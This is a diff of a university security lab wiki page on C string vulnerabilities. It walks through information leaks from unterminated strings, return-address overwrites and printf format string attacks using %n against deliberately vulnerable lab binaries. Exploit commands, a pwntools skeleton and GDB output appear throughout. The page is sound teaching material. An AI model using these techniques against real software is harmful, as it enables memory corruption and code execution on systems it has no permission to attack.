Differences

This shows you the differences between two versions of the page.

cns:labs:lab-07 [2019/11/10 19:10]
cristina.popescu [Information Leak]
cns:labs:lab-07 [2022/11/21 14:29] (current)
mihai.dumitru2201 [Basic Format String Attack]
Line 1: Line 1:
-====== Lab 07 - Strings ======+====== Lab 07 - Strings ====== ​
  
-===== Resources =====+===== Tasks repository =====
  
-  * [[http://​www.cert.org/​books/​secure-coding/​|Secure Coding ​in C and C++]] +All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. 
-  * [[http://​www.informit.com/​articles/​article.aspx?​p=2036582|String representation in C]] +
-  * [[https://​www.owasp.org/​index.php/​Improper_string_length_checking|Improper string length checking]] +
-  * [[http://​cwe.mitre.org/​data/​definitions/​134.html|Format String definition]],​ [[https://​www.owasp.org/​index.php/​Format_string_attack|Format String Attack ​ (OWASP)]], [[http://​projects.webappsec.org/​w/​page/​13246926/​Format%20String|Format String Attack (webappsec)]] ​  +
-  * [[http://​www.gratisoft.us/​todd/​papers/​strlcpy.html|strlcpy and strlcat - consistent, safe, string copy and concatenation.]] This resource is useful to understand some of the string manipulation problems. +
- +
-===== Lab Support Files ===== +
- +
-We will use this [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-07.tar.gz|lab archive]] throughout the lab. +
- +
-Please download the lab archive and then unpack it using the commands below: +
-<code bash> +
-student@mjolnir:​~$ wget http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-07.tar.gz +
-student@mjolnir:​~$ tar xzf lab-07.tar.gz +
-</​code>​ +
- +
-After unpacking we will get the ''​lab-07/''​ folder that we will use for the lab: +
-<code bash> +
-student@mjolnir:​~$ cd lab-07/ +
-student@mjolnir:​~/​lab-07$ ls +
-basic-format-string ​ basic-info-leak +
-format-string ​ info-leak +
-printf-features ​ string-shellcode +
-</​code>​+
  
 ===== Intro ===== ===== Intro =====
Line 52: Line 29:
 In C, the length of an ASCII string is given by its contents. An ASCII string ends with a ''​0''​ value byte called the ''​NUL''​ byte. Every ''​str*''​ function (i.e. a function with the name starting with ''​str'',​ such as ''​strcpy'',​ ''​strcat'',​ ''​strdup'',​ ''​strstr''​ etc.) uses this ''​0''​ byte to detect where the string ends. As a result, not ending strings in ''​0''​ and using ''​str*''​ functions leads to vulnerabilities. In C, the length of an ASCII string is given by its contents. An ASCII string ends with a ''​0''​ value byte called the ''​NUL''​ byte. Every ''​str*''​ function (i.e. a function with the name starting with ''​str'',​ such as ''​strcpy'',​ ''​strcat'',​ ''​strdup'',​ ''​strstr''​ etc.) uses this ''​0''​ byte to detect where the string ends. As a result, not ending strings in ''​0''​ and using ''​str*''​ functions leads to vulnerabilities.
  
-====  Basic Info Leak (tutorial) ====+====  ​1. Basic Info Leak (tutorial) ====
  
-Enter the ''​basic-info-leak/''​ subfolder ​in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-07.tar.gz|lab archive]]. It's a basic information leak example.+Enter the ''​01-basic-info-leak/''​ subfolder. It's a basic information leak example.
  
-In ''​basic_info_leak.c'',​ ''​buf''​ is supplied as input, hence is not trusted. We should be careful with this buffer. If the user gives ''​32''​ bytes as input then ''​strcpy''​ will copy bytes in ''​my_string''​ until it finds a ''​NUL''​ byte (''​0x00''​). Because the [[cns:​labs:​lab-05|stack grows down]], on most platforms, we will start accessing the content of the stack. After the ''​buf''​ variable the stack stores the ''​old ​ebp'',​ the function return address and then the function parameters. This information is copied into ''​my_string''​. As such, printing information in ''​my_string''​ (after byte index ''​32''​) using ''​puts()''​ results in information leaks.+In ''​basic_info_leak.c'',​ ''​buf''​ is supplied as input, hence is not trusted. We should be careful with this buffer. If the user gives ''​32''​ bytes as input then ''​strcpy''​ will copy bytes in ''​my_string''​ until it finds a ''​NUL''​ byte (''​0x00''​). Because the [[cns:​labs:​lab-05|stack grows down]], on most platforms, we will start accessing the content of the stack. After the ''​buf''​ variable the stack stores the ''​old ​rbp'',​ the function return address and then the function parameters. This information is copied into ''​my_string''​. As such, printing information in ''​my_string''​ (after byte index ''​32''​) using ''​puts()''​ results in information leaks.
  
 We can test this using: We can test this using:
 <​code>​ <​code>​
-$ python -c 'print "​A"​*32'​ | ./​basic_info_leak  +$ python -c 'import sys; sys.stdout.buffer.write(b"​A"​*32)' | ./​basic_info_leak  
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX�����+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8
 </​code>​ </​code>​
  
 In order to check the hexadecimal values of the leak, we pipe the output through ''​xxd'':​ In order to check the hexadecimal values of the leak, we pipe the output through ''​xxd'':​
 <​code>​ <​code>​
-$ python -c 'print "​A"​*32'​ | ./​basic_info_leak | xxd+$ python -c 'import sys; sys.stdout.buffer.write(b"​A"​*32)' | ./​basic_info_leak | xxd
 00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA 00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
 00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA 00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
-00000020: ​786d 99ff f184 0408 0a+00000020: ​d066 57b4 fc7f 0a                        ​.fW....
 </​code>​ </​code>​
  
-We have leaked ​two values ​above: +We have leaked ​one value above: 
-  * the old/stored ''​ebp''​ value (right after the buffer): ''​0xff996d78''​ (it's a little endian architecture);​ it will differ on your system +  * the lower non-0 bytes of the old/stored ''​rbp''​ value (right after the buffer): ''​0x7ffcb45766d0''​ (it's a little endian architecture);​ it will differ on your system
-  * the ''​my_main()''​ return address: ''​0x080484f1''​+
  
-The return address usually doesn'​t change (except for executables with PIE, //Position Independent Executable//​ support). But assuming ASLR is enabled, the ''​ebp''​ value changes at each run. If we leak it we have a basic address that we can toy around to leak or overwrite other values. We'll see more of that in the [[#​p_information_leak|Information Leak]] task. +The return address usually doesn'​t change (except for executables with PIE, //Position Independent Executable//​ support). But assuming ASLR is enabled, the ''​rbp''​ value changes at each run. If we leak it we have a basic address that we can toy around to leak or overwrite other values. We'll see more of that in the [[#​p_information_leak|Information Leak]] task.
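As a minimal sketch (not part of the lab skeleton), the bytes printed after the buffer can be turned back into an address in Python. The byte values are copied from the ''xxd'' dump of the sample run; the helper name ''decode_leak'' is an assumption made for illustration, and it assumes that ''puts()'' appended exactly one trailing newline.

```python
def decode_leak(output: bytes, buf_len: int = 32) -> int:
    """Interpret the bytes printed after the buffer as a little-endian address."""
    # puts() appends one newline; everything between the buffer and that
    # newline is leaked stack content.
    leak = output[buf_len:-1]
    return int.from_bytes(leak, "little")


# Program output from the sample run: 32 "A"s, six leaked bytes, one newline.
sample = b"A" * 32 + bytes.fromhex("d06657b4fc7f") + b"\n"
print(hex(decode_leak(sample)))  # 0x7ffcb45766d0
```

The same decoding applies to whatever bytes your own run leaks; only the sample bytes change.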
-====  Recap: String Shellcode ====+
  
-For starters, let's do a recap on creating a shellcode-based attack and exploiting a string-based vulnerability. +==== 2. Information Leak ==== 
- +
-In the ''​string-shellcode/''​ subfolder in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-07.tar.gz|lab archive]] you have a vulnerable executable dubbed ''​string_shellcode''​. The original source code is ''​string_shellcode.c''​. There is an obvious vulnerability when using ''​strcpy()''​ that will lead to an overflow and a rewrite of the ''​get_num_alpha()''​ function return address when called with a large enough number of characters in ''​g_buffer''​. +
- +
-Fill the ''​TODO''​ spots in the ''​exploit.py''​ script to inject and execute a shell. +
- +
-<note tip> +
-ASLR is on. The ''​shellcode''​ will be stored at the beginning of the ''​g_buffer''​ global variable which has a constant address. You can determine it using: +
-<​code>​ +
-nm string_shellcode | grep ' g_buffer'​ +
-</​code>​ +
-</​note>​ +
- +
-<note tip> +
-Use GDB PEDA and ''​pattc''​ and ''​patto''​ to determine the offset between ''​l_buffer''​ and the ''​get_num_alpha()''​ function return address. +
- +
-In GDB/PEDA in order to send a given string (such as the pattern outputted by ''​pattc''​) to the program standard input, use the process substitution construct:​ +
-<​code>​ +
-gdb-peda$ r < <(echo '​AAAA.....'​) +
-</​code>​ +
-</​note>​ +
- +
-<note tip> +
-Construct the ''​payload''​ as usual: add the shellcode, add padding and overwrite the ''​get_num_alpha()''​ function return address with the address of the shellcode (i.e. the address of the ''​g_buffer''​) global variable. +
-</​note>​ +
-==== Information Leak ==== +
  
-We will now show how improper string handling will lead to information leaks from the memory. For this, please access the ''​info-leak/''​ subfolder ​in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-07.tar.gz|lab archive]]. Please browse the ''​info-leak.c''​ source code file. The executable file is already generated in ''​info-leak''​ (a 32-bit ELF file).+We will now show how improper string handling will lead to information leaks from the memory. For this, please access the ''​02-info-leak/''​ subfolder. Please browse the ''​info-leak.c''​ source code file.
    
 The snippet below is the relevant code snippet. The goal is to call the ''​my_evil_func()''​ function. One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. If you have memory writes, then getting code execution is a matter of getting things right. In this task we are assuming that we have memory write (i.e. we can write any value at any address). You can call the ''​my_evil_func()''​ function by overriding the return address of the ''​my_main()''​ function: The snippet below is the relevant code snippet. The goal is to call the ''​my_evil_func()''​ function. One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. If you have memory writes, then getting code execution is a matter of getting things right. In this task we are assuming that we have memory write (i.e. we can write any value at any address). You can call the ''​my_evil_func()''​ function by overriding the return address of the ''​my_main()''​ function:
Line 168: Line 118:
 </​code>​ </​code>​
  
-We see we have an information leak. We leak two pieces ​of data above: ''​0x7fffffffdcf0''​. ​The first one seems to be a stack address and the second one a code/text address. +We see we have an information leak. We leak one piece of data above: ''​0x7fffffffdcf0''​.
 If we run multiple times we can see that the values for the first piece of information differ: If we run multiple times we can see that the values for the first piece of information differ:
 <code bash> <code bash>
Line 180: Line 129:
 $ gdb -q ./info_leak $ gdb -q ./info_leak
 Reading symbols from ./​info_leak...done. Reading symbols from ./​info_leak...done.
-gdb-peda$ b printf+gdb-peda$ b my_main
 Breakpoint 1 at 0x400560 Breakpoint 1 at 0x400560
 gdb-peda$ r < <(python -c '​import sys; sys.stdout.write(32*"​A"​)'​) gdb-peda$ r < <(python -c '​import sys; sys.stdout.write(32*"​A"​)'​)
 Starting program: info_leak < <(python -c '​import sys; sys.stdout.write(32*"​A"​)'​) Starting program: info_leak < <(python -c '​import sys; sys.stdout.write(32*"​A"​)'​)
 [...] [...]
 +
 +# Do next instructions until after the call to printf.
 +gdb-peda$ ni
 +....
  
 gdb-peda$ x/12g name gdb-peda$ x/12g name
Line 207: Line 160:
 </​code>​ </​code>​
  
-From the GDB above, we determine that, after our buffer, there are two values: one value is the stored ''rbp'' (i.e. old rbp) and one value is the return address of the ''my_main()'' function (that gets it back to ''main()'').+From the GDB above, we determine that, after our buffer, there is the stored ''rbp'' (i.e. old rbp).
 + 
 +<​note>​ 
 +In a 32-bit program there would (usually) be 2 leaked values:
 +  * The old ''​ebp''​ 
 +  * The return address of the function 
 + 
 +This happens if the values of the old ''​ebp'' ​and the return address ​don't have any ''​\x00''​ bytes. 
 + 
 +In the 64-bit example we only get the old ''rbp'' because the 2 high bytes of the stack address are always ''0'', which terminates the string early.
 +</​note>​
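The effect described in the note can be reproduced with a short Python sketch. It models a ''str*'' function as "copy until the first NUL" and applies that to the stack contents that follow the buffer. The 64-bit return address used here is a hypothetical placeholder, the 32-bit values are sample values of the kind seen in a 32-bit build, and ''leaked_bytes'' is an illustrative helper name.

```python
import struct


def leaked_bytes(stack_after_buffer: bytes) -> bytes:
    """Return what a str* function copies: everything before the first NUL."""
    return stack_after_buffer.split(b"\x00", 1)[0]


# 64-bit: saved rbp from the GDB session, then a hypothetical return address.
stack64 = struct.pack("<QQ", 0x00007FFFFFFFDC50, 0x0000000000400600)
# 32-bit: a sample saved ebp followed by a sample return address.
stack32 = struct.pack("<II", 0xFF996D78, 0x080484F1)

print(leaked_bytes(stack64).hex())  # only the 6 non-zero bytes of rbp
print(leaked_bytes(stack32).hex())  # both 4-byte values, no NUL in between
```

On 64-bit the copy stops inside the saved ''rbp'', so the return address is never reached.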
  
-When we leak the two values we are able to retrieve the stored ''rbp'' value. In the above run the value of ''ebp'' is ''0x00007fffffffdc50''. We also see that the stored ''rbp'' value is stored at **address** ''0x7fffffffdc40'', which is the address current ''rbp''. We have the situation in the below diagram:+Leaking this value gives us the stored ''rbp''. In the above run the stored ''rbp'' is ''0x00007fffffffdc50''. We also see that it is stored at **address** ''0x7fffffffdc40'', which is the value of the current ''rbp''. We have the situation in the diagram below:
  
 {{ :​cns:​labs:​info-leak-stack-64.png?​600 |}} {{ :​cns:​labs:​info-leak-stack-64.png?​600 |}}
Line 215: Line 178:
 We marked the stored ''​rbp''​ value (i.e. the frame pointer for ''​main()'':​ ''​0x7fffffffdc50''​) with the font color red in both places. We marked the stored ''​rbp''​ value (i.e. the frame pointer for ''​main()'':​ ''​0x7fffffffdc50''​) with the font color red in both places.
  
-In short, if we leak the value of the stored ''rbp'' (i.e. the frame pointer for ''main()'': ''0x00007fffffffdc50'') we can determine the address where the current ''rbp'' (i.e. the frame pointer for ''my_main()'': ''0x7fffffffdc40'') by subtracting ''16''. The address where the ''my_main()'' return address is stored (''0x7fffffffdc48'') is computed by subtracting ''8'' from the leaked ''rbp'' value. By overwriting the value at this address we will force an arbitrary code execution and call ''my_evil_func()''.+In short, if we leak the value of the stored ''rbp'' (i.e. the frame pointer for ''main()'': ''0x00007fffffffdc50'') we can determine the value of the current ''rbp'' (i.e. the frame pointer for ''my_main()'': ''0x7fffffffdc40'') by subtracting ''16''. The address where the ''my_main()'' return address is stored (''0x7fffffffdc48'') is computed by subtracting ''8'' from the leaked ''rbp'' value. By overwriting the value at this address we redirect execution and call ''my_evil_func()''.
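The arithmetic can be written down as a small Python sketch. The offsets ''16'' and ''8'' come from the GDB session for this particular binary and should be re-checked if the binary is rebuilt; ''frame_addresses'' is a hypothetical helper name.

```python
def frame_addresses(leaked_rbp: int) -> dict:
    """Derive my_main()'s frame pointer and return-address slot from the leak."""
    return {
        "my_main_rbp": leaked_rbp - 16,         # value of rbp inside my_main()
        "return_address_slot": leaked_rbp - 8,  # where my_main()'s return address lives
    }


addrs = frame_addresses(0x7FFFFFFFDC50)
for name, value in addrs.items():
    print(f"{name}: {value:#x}")
```

The ''return_address_slot'' value is the address to hand to ''my_memory_write()''.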
  
 In order to write the return address of the ''​my_main()''​ function with the address of the ''​my_evil_func()''​ function, make use of the conveniently (but not realistically) placed ''​my_memory_write()''​ function. The ''​my_memory_write()''​ allows the user to write arbitrary values to arbitrary memory addresses. In order to write the return address of the ''​my_main()''​ function with the address of the ''​my_evil_func()''​ function, make use of the conveniently (but not realistically) placed ''​my_memory_write()''​ function. The ''​my_memory_write()''​ allows the user to write arbitrary values to arbitrary memory addresses.
Line 222: Line 185:
  
 <note tip> <note tip>
-Same as above, use ''​nm''​ to determine address of the ''​my_evil_func()''​ function.+Same as above, use ''​nm''​ to determine address of the ''​my_evil_func()''​ function.  
 +When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. The precompiled binary can be found in [[cns:​resources:​repo|the CNS public repository]].
 </​note>​ </​note>​
  
 <note tip> <note tip>
-Use the above logic to determine the ''​old ​ebp''​ leak and then the address of the ''​my_main()''​ return address.+Use the above logic to determine the ''​old ​rbp''​ leak and then the address of the ''​my_main()''​ return address.
 </​note>​ </​note>​
  
Line 234: Line 198:
  
 <note tip> <note tip>
-In case of a successful exploit the program will return with the ''​42''​ error code in the ''​my_evil_func()''​ function, same as below:+In case of a successful exploit the program will spawn a shell in the ''​my_evil_func()''​ function, same as below:
 <​code>​ <​code>​
 $ python exploit.py ​ $ python exploit.py ​
 [!] Could not find executable '​info_leak'​ in $PATH, using '​./​info_leak'​ instead [!] Could not find executable '​info_leak'​ in $PATH, using '​./​info_leak'​ instead
 [+] Starting local process '​./​info_leak':​ pid 6422 [+] Starting local process '​./​info_leak':​ pid 6422
-[*] old_ebp ​is 0x7fffffffdd40+[*] old_rbp ​is 0x7fffffffdd40
 [*] return address is located at is 0x7fffffffdd38 [*] return address is located at is 0x7fffffffdd38
-[*] Process '​./​info_leak'​ stopped with exit code 42 (pid 6422)+[*] Switching to interactive mode 
 +Returning from main! 
 +$ id 
 +uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
 </​code>​ </​code>​
 </​note>​ </​note>​
Line 262: Line 229:
 Let's recap some of [[http://​www.cplusplus.com/​reference/​cstdio/​printf/​|useful formats]]: Let's recap some of [[http://​www.cplusplus.com/​reference/​cstdio/​printf/​|useful formats]]:
  
-  * %08x -- prints a number in hex format, meaning takes a number from the stack and prints in hex format +  * ''​%08x'' ​-- prints a number in hex format, meaning takes a number from the stack and prints in hex format 
-  * %s -- prints a string, meaning takes a pointer from the stack and prints the string from that address +  * ''​%s'' ​-- prints a string, meaning takes a pointer from the stack and prints the string from that address 
-  * %n -- writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). This format is not widely used but it is in the C standard.+  * ''​%n'' ​-- writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). This format is not widely used but it is in the C standard.
  
 ''​%x''​ and ''​%n''​ are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user. ''​%x''​ and ''​%n''​ are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user.
Line 299: Line 266:
 ==== Basic Format String Attack ==== ==== Basic Format String Attack ====
  
-You will now do a basic format string attack using the ''​basic-format-string/''​ subfolder ​in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-07.tar.gz|lab archive]]. The source code is in ''​basic_format_string.c''​ and the executable is in ''​basic_format_string''​.+You will now do a basic format string attack using the ''​03-basic-format-string/''​ subfolder. The source code is in ''​basic_format_string.c''​ and the executable is in ''​basic_format_string''​.
  
-You need to use ''​%n''​ to overwrite the value of the ''​v''​ variable to ''​200''​. You have to do three steps:+You need to use ''​%n''​ to overwrite the value of the ''​v''​ variable to ''​0x300''​. You have to do three steps:
   - Determine the address of the ''​v''​ variable using ''​nm''​.   - Determine the address of the ''​v''​ variable using ''​nm''​.
   - Determine the ''​n''​-th parameter of ''​printf()''​ that you can write to using ''​%n''​. The ''​buffer''​ variable will have to be that parameter; you will store the address of the ''​v''​ variable in the ''​buffer''​ variable.   - Determine the ''​n''​-th parameter of ''​printf()''​ that you can write to using ''​%n''​. The ''​buffer''​ variable will have to be that parameter; you will store the address of the ''​v''​ variable in the ''​buffer''​ variable.
-  - Construct a format string that enables the attack; the number of characters processed by ''​printf()''​ until ''​%n''​ is matched will have to be ''​200''​.+  - Construct a format string that enables the attack; the number of characters processed by ''​printf()''​ until ''​%n''​ is matched will have to be ''​0x300''​.
  
 For the second step let's run the program multiple times and figure out where the ''​buffer''​ address starts. We fill ''​buffer''​ with the ''​aaaa''​ string and we expect to discover it using the ''​printf()''​ format specifiers. For the second step let's run the program multiple times and figure out where the ''​buffer''​ address starts. We fill ''​buffer''​ with the ''​aaaa''​ string and we expect to discover it using the ''​printf()''​ format specifiers.
Line 325: Line 292:
 </​code>​ </​code>​
  
-In the last run we get the ''​4141414141414141''​ representation of ''​AAAAAAAA''​. That means that, if we replace the final ''​%lx''​ with ''​%n'',​ we will write the address ''​0x4141414141414141''​ the number of characters processed so far:+In the last run we get the ''​4141414141414141''​ representation of ''​AAAAAAAA''​. That means that, if we replace the final ''​%lx''​ with ''​%n'',​ we will write at the address ''​0x4141414141414141''​ the number of characters processed so far:
 <​code>​ <​code>​
 $ echo -n '​7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a'​ | wc -c $ echo -n '​7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a'​ | wc -c
Line 331: Line 298:
 </​code>​ </​code>​
  
-We need that number to be ''​200''​. You can fine tune the format string by using a construct such as ''​%32llx''​ to print a number on ''​32''​ characters instead of a maximum of ''​16''​ characters. See how much extra room you need and see if you reach ''​200''​ bytes.+We need that number to be ''​0x300''​. You can fine tune the format string by using a construct such as ''​%32llx''​ to print a number on ''​32''​ characters instead of a maximum of ''​16''​ characters. See how much extra room you need and see if you reach ''​0x300''​ bytes.
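One way to plan the widths is sketched below in Python. It assumes that every conversion uses a width of at least ''16'', so each one prints exactly its width regardless of the value on the stack, and that nothing else is printed before ''%n''. The count of five conversions is hypothetical; use the count you determined for the real binary. Both function names are made up for illustration.

```python
def widths_for_total(total: int, n_specs: int, min_width: int = 16) -> list:
    """Pick field widths so that n_specs hex conversions print exactly total chars."""
    if n_specs < 1:
        raise ValueError("need at least one conversion")
    last = total - min_width * (n_specs - 1)
    if last < min_width:
        raise ValueError("total is too small for this many conversions")
    return [min_width] * (n_specs - 1) + [last]


def printed_length(widths, values) -> int:
    """Emulate printf's %<width>llx: right-aligned hex, at least width chars."""
    return sum(len(f"{v:{w}x}") for w, v in zip(widths, values))


widths = widths_for_total(0x300, n_specs=5)  # 5 conversions is a hypothetical count
fmt = "".join(f"%{w}llx" for w in widths) + "%n"
print(fmt)
```

If the real format string prints other characters before ''%n'', subtract them from the total first.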
  
 <note important>​ <note important>​
Line 339: Line 306:
 After the plan is complete, write down the attack by filling the ''​TODO''​ lines in the ''​exploit.py''​ solution skeleton. After the plan is complete, write down the attack by filling the ''​TODO''​ lines in the ''​exploit.py''​ solution skeleton.
  
-After you write 200 chars in v, you should obtain shell+/* 
 +<note tip> 
 +When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. The precompiled binary can be found in [[cns:​resources:​repo|the CNS public repository]]. 
 +</​note>​ 
 +*/ 
 + 
 +After you write 0x300 chars in ''v'', you should obtain a shell:
 <​code>​ <​code>​
-$ python ​exploit64.py +$ python ​exploit.py 
 [!] Could not find executable '​basic_format_string'​ in $PATH, using '​./​basic_format_string'​ instead [!] Could not find executable '​basic_format_string'​ in $PATH, using '​./​basic_format_string'​ instead
 [+] Starting local process '​./​basic_format_string':​ pid 20785 [+] Starting local process '​./​basic_format_string':​ pid 20785
Line 350: Line 323:
  
 ==== Extra: Format String Attack ==== ==== Extra: Format String Attack ====
 +
 +Go to the ''​04-format-string/''​ subfolder.
 +In this task you will be working with a **32-bit binary**.
  
 The goal of this task is to call ''​my_evil_func''​ again. This task is also tutorial based. The goal of this task is to call ''​my_evil_func''​ again. This task is also tutorial based.
Line 385: Line 361:
 Now, because we are able to select //any// higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer. Now, because we are able to select //any// higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer.
 <code bash> <code bash>
-$ ./format "$(perl -e 'printf "%%08x\x0a"x10000')" +$ ./format "$(python -c 'print("%08x\n" * 10000)')"
 </​code>​ </​code>​
  
Line 397: Line 373:
 </​code>​ </​code>​
  
-By trial and error or by using GDB (breakpoint on ''printf'') we can determine+By trial and error or by using GDB (breakpoint on ''printf'') we can determine where the buffer starts:
 <code bash> <code bash>
-$ ./format "$(perl -e 'printf "A"x512 . "%%08x   \x0a"x200')"  | grep -n 41 | head +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"%08x\n   " * 0x300)')"  | grep -n 41 | head
-17:415729ac ​   +10:   ffffc410 
-56:ffffdd41 ​   +52:   ffffcc41 
-128:41007461 ​   +72:   ffffcf41 
-129:41414141 ​  ​ +175:   44434241
-130:​41414141 ​+
 </​code>​ </​code>​
  
 <​note>​ <​note>​
-Command line Perl/Python exploits tend to get very tedious and hard to read when the payload gets more complex. You can use the following reference ​Perl script to write your exploit. The code is equivalent to the above one-liner.+Command line Python exploits tend to get very tedious and hard to read when the payload gets more complex. You can use the following reference ​pwntools ​script to write your exploit. The code is equivalent to the above one-liner.
  
-<code perl>+<code python>
-#​!/​usr/​bin/​env ​perl+#​!/​usr/​bin/​env ​python3
  
-use strict; +from pwn import *
-use warnings; +
-use v5.20;+
  
-my $stack_items = 1000;+stack_items = 200
  
-printf "A" x 512; +pad = b"ABCD"
-printf ​"%%08x   ​\x0a" ​x $stack_items;+val_fmt = b"%08x\n   " 
 +# add a \n at the end for consistency with the command line run 
 +fmt = pad + val_fmt * stack_items ​+ b"​\n"​ 
 + 
 +io = process(["​./​format",​ fmt]) 
 + 
 +io.interactive()
 </​code>​ </​code>​
  
-Then call the ''​format''​ using (note the enclosing double-quotes):+Then call the ''​format''​ using:
  
 <​code>​ <​code>​
-./format "​$(perl ​exploit.pl)"+python ​exploit.py
 </​code>​ </​code>​
 </​note>​ </​note>​
  
-One idea is to keep things in multiple of 4, like I did for "%08x   \x0a". If you are looking at line ''128'', one of our ''A''s is there. Because the machine is little endian, the 0x41 appears as most significant byte. We want to fix this, to have our buffer aligned. Note, you can add as many format strings you want, the start of the buffer will be the same (more or less).+One idea is to keep things in multiples of 4, like "%08x   \n". If you look at line ''175'', we have ''44434241'', which is the base 16 representation of ''"ABCD"'' (because the machine is little endian). Note that you can add as many format strings as you want; the start of the buffer will be the same (more or less).
  
 We can compress our buffer by specifying the position of the argument. We can compress our buffer by specifying the position of the argument.
 <code bash> <code bash>
-$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08x"')" +$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08x")')"
-BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45444342+ABCDAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAA44434241
 This is the most useless and insecure program! This is the most useless and insecure program!
 </​code>​ </​code>​
-You can see that the last information is our "BCDE" string printed with ''​%08x''​ this means that we know where'​s ​our buffer.+ 
 +<note warning>''​b"​AAAAAAAA"​ * 199''​ is added to maintain the length of the original string, otherwise the offset might change.</​note>​ 
 +You can see that the last piece of output is our ''b"ABCD"'' string printed with ''%08x''; this means that we know where our buffer is.
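The byte order can be checked with Python's ''struct'' module. This is only an illustration of little-endian packing; the second value packed below is the GOT address used later in this task.

```python
import struct

marker = b"ABCD"
# The four marker bytes read back as one little-endian 32-bit integer.
as_int = struct.unpack("<I", marker)[0]
print(f"{as_int:08x}")  # 44434241

# The reverse direction: the bytes to place in the buffer for a chosen address.
got_puts = struct.pack("<I", 0x0804C014)
print(got_puts.hex())  # 14c00408
```

Replacing the ''ABCD'' marker with such packed bytes is what turns the positional argument into a pointer that we choose.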
  
 <note tip> <note tip>
Line 468: Line 449:
 We can replace ''%08x'' with ''%n''; this should lead to a segmentation fault. We can replace ''%08x'' with ''%n''; this should lead to a segmentation fault.
 <code bash> <code bash>
-$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08n"')"+$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"AAAAAAAA" * 199 + b"%175$08n")')"
 Segmentation fault (core dumped) Segmentation fault (core dumped)
 $ gdb ./format -c core $ gdb ./format -c core
Line 482: Line 463:
 => 0xf7e580a2 <​vfprintf+17906>:​ mov ​   %edx,(%eax) => 0xf7e580a2 <​vfprintf+17906>:​ mov ​   %edx,(%eax)
 (gdb) info registers $edx $eax (gdb) info registers $edx $eax
-edx            0x202 514 +edx            0x63c 1596
-eax            ​0x45444342 1162101570+eax            ​0x44434241 1145258561
 (gdb) quit (gdb) quit
 </​code>​ </​code>​
-Bingo. We have memory write. The vulnerable code tried to write at the address ''0x45444342'' ("BCDE" little endian) the value 514. The value 514 is the amount of data wrote so far by ''printf'' (510 ''A''s and "BCDE").+Bingo. We have memory write. The vulnerable code tried to write at the address ''0x44434241'' ("ABCD" little endian) the value 1596. The value 1596 is the amount of data written so far by ''printf'' (''"ABCD" + 199 * "AAAAAAAA"'').
  
-Right now, our input string has 518 bytes. But we can further compress it, thus making the value that we write independent of the length of the input.+Right now, our input string has 1604 bytes (1605 with a ''\n'' at the end). But we can further compress it, thus making the value that we write independent of the length of the input.
  
 <code bash> <code bash>
-$ ./format "$(perl -e 'printf "BCDE" . "A"x506 . "%%99x" . "%%126\$08n"')"+$ ./format "$(python -c 'import sys; sys.stdout.buffer.write(b"ABCD" + b"A" * 1588 + b"%99x" + b"%175$08n")')"
 Segmentation fault (core dumped) Segmentation fault (core dumped)
 $ gdb ./format -c core $ gdb ./format -c core
 (gdb) info registers $edx $eax (gdb) info registers $edx $eax
-edx            0x261 609 +edx            0x69b 1691
-eax            ​0x45444342 1162101570+eax            ​0x44434241 1145258561
 (gdb) quit (gdb) quit
 </​code>​ </​code>​
